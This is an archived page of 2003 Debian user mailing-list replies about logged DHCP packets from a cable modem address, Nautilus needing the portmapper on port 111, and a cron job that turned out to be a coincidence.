On Dienstag, 10-Jun-03 at 19:59:40, Phillip Hofmeister wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 On Tue, 10 Jun 2003 at 07:21:25PM +0100, Andreas W?st wrote:
 Hi
 
 Hello,
 
 isn't perhaps 10.208.64.1 your dhcp server and aren't this reply to
 dhcp requests from clients?
 
 No lan here.. !!
 
 That IP address might be used by your cable modem service as an
 internal management address to hand out IP addresses. Or it might even
 be your bridge (cable modem). In either case. This is not something to
 be worried about. In fact I made a special rule in my iptables so such
 packets don't get logged.

Cool, thanks a lot for your help!!

So, can I happily block them? As it
seems, unfortunately I have to keep udp port 68 stateful open, to renew
the dhcp lease, no?

-- 
All the best, and really thanks a lot for your answers,
Andi

Re: nautilus and portmapper port 111

2003-06-10 Thread Andreas Wüst 
Hello Chris

Thank you for your answer!

On Dienstag, 10-Jun-03 at 21:39:47, Chris Caldwell wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1
 
 Andreas Wüst sent the following message Today:
 
 No matter if I try netstat -apn or netstat -atunp as someone
 in private, it gives the same result as netstat -tu -l
 -ee -p, apart AW from the established connections, namely there is
 nothing listening in AW port 111.
 
 Have you tried rpcinfo -p localhost to see if Nautilus is
 registering a connection to portmap?

No, I haven't yet, but will do!

 The newer Gnome installs
 (gnomevfs) depend on fam, which depends on portmap.

Umm, I thouth woody gnome wouldn't depend on fam, no?

 I don't
 believe there is a direct dependency from core Nautilus to
 portmap, but possibly some of the Nautilus extras or vfs extrase
 are causing the dependency.

Yeah, it's strange. Even stranger, that nautilus won't start at all, if
the connection to port 111 fails!!

-- 
Best wishes,
Andi

Re: cronjob stuck

2003-06-10 Thread Dale Amon 
On Tue, Jun 10, 2003 at 10:22:09PM +0100, Dale Amon wrote:
 Has anyone else had trouble making vixie cron STFU? Am
 I hallucinating? Is my brain in need of Coke and MM's?

Actually I've now done pretty much just that and 
discovered it was a strange coincidence... some other
process was doing exactly the same thing my cronjob was
to do with exactly the same 5 minute interval between
runs and one minute off the execution times I expected!

queue Twilight Zone Theme